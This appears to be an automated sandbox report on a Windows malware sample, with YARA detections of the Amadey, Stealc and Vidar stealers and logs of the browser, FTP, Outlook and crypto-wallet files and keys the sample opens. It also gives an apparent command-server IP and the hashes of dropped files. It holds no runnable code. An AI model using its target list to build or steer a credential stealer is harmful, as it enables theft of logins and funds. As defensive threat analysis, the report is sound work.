Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0032CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0032CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8NjcvPNvUr.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.axplong.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorti.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2597088663.0000000000C11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1671801821.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1675477265.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2918910724.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686962382.0000000000251000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2917060920.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2581050540.0000000000C31000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2894591592.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2583529473.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2624183793.0000000000161000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1646914166.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2556118142.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1715844262.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1712103381.0000000000311000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2288311449.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2539138364.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: \jaxx\Local Storage\
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: passphrase.json
Source: 8ec8c5c339.exe	String found in binary or memory: \jaxx\Local Storage\
Source: 8ec8c5c339.exe	String found in binary or memory: \Ethereum\
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16nes\AppData\Roaming\Binance\simple-storage.json
Source: 8ec8c5c339.exe	String found in binary or memory: Ethereum
Source: 8ec8c5c339.exe	String found in binary or memory: file__0.localstorage
Source: 8ec8c5c339.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 8ec8c5c339.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: 8ec8c5c339.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0C40 sqlite3_bind_zeroblob,	8_2_6C3B0C40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0D60 sqlite3_bind_parameter_name,	8_2_6C3B0D60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D8EA0 sqlite3_clear_bindings,	8_2_6C2D8EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	8_2_6C3B0B40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DC030 sqlite3_bind_parameter_count,	8_2_6C2DC030
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D6070 PR_Listen,	8_2_6C2D6070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	8_2_6C2DC050

Windows Analysis Report
8NjcvPNvUr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1483377
Product:	CloudBasic
Start time:	05:37:08
Start date:	27.07.2024
Sample:	8NjcvPNvUr.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e04afeeb6bb46b372bc1d7c2e2f25ead
SHA1:	684d7f3cf0f8f94b1a58b39a97fd2f8f37f4a380
SHA256:	71db154390c24f07114784bf363d39dac8f1699c517064327724f83ca4acdfb9
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AECAECFCAAEBFHIEHDGHDHCBAK	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\AEHIECAFCGDBFHIDBKFC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\EGIDHDGCBFBKECBFHCAF	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\FHDAFIIDAKJDGDHIDAKJ	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\FIDAFCAF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\JECAEHJJJKJKFIDGCBGIJJJEHI	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\JJJEGCGD	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\KJKJJEGIDBGIDGCBAFHCGCGCGD	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8ec8c5c339.exe_11f9e6f50925d59ff337ab9ea505e88f9c27f_ead0fcb4_1198fe4c-3e59-49b5-9b3d-6e0403735303\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	183B7AB320042B1715EDE48AF0399634	27186AECB88712075C43FCC6F4409F1B8BE51A9E	BBB5730A7BE5FFFE5B8C8C6CA57E658ED71C1292427C87C428B1DC2223AFB0ED
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8ec8c5c339.exe_11f9e6f50925d59ff337ab9ea505e88f9c27f_ead0fcb4_f47d5e4c-9543-46c7-9068-4d788eb57bf1\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	38723826374C93D004D8DC2BD33DDFE8	81D418E22D85CABDC01D731CB9FEF8A5E9718458	03B0F7717C32A2AE77D6CE54480581F0BBD39E9CAEA226D34D03598F68E7F8D2
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8ec8c5c339.exe_96fd7593117a51ef401955134535525854013e0_ead0fcb4_265c04e2-7da8-4aeb-b407-742220e2345d\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	D9FCB17D0182D3A4FACE4605140F35D5	2FD56B97A6AB990A9CB1898A3617F2F423696B2D	0EF58D9C10E0CAF225B8F908309BE50989D347AE3F93B1C5EF7ECACF1B3D3588
C:\ProgramData\Microsoft\Windows\WER\Temp\WER800F.tmp.dmp	Mini DuMP crash report, 14 streams, Sat Jul 27 03:39:30 2024, 0x1205a4 type	71001CE1A6E726F3B4CC7CB72DF709FB	C683142E522DCF0CB65C3162CC9A15EE0667F15D	60EA2F69668DCF015E2D99DA35A6914889589D18C4878FCEB55D211DA88761D6
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8196.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	78D2FAAF5F5C3EF5907CD1D52C3D6812	9A58904CC3DB04D03B465B0AF55EF3A4B1A60387	7DED80B88B71191B430AB782F80BC4642022FA58FDE55770C495AAE5B42F041F
C:\ProgramData\Microsoft\Windows\WER\Temp\WER81C6.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	1577053DC76D91E442512B0732CBDF6F	1A0407A1A1B40486D759FFCA536151A9385CDBE9	2477D8A72A5BE3F1075C293D1486CCB68340F4C818AE694A3B818D2B853117F4
C:\ProgramData\Microsoft\Windows\WER\Temp\WER857D.tmp.dmp	Mini DuMP crash report, 14 streams, Sat Jul 27 03:39:31 2024, 0x1205a4 type	0F3F4E5C612222085CA24EF4700CF06C	31C2E69257FEE868C0D4A541BC578AA0B99E49C5	5FF251419EEBB6E2AA68D110E9D45828343852AC0A37A76D29C34FBE54BE6FE7
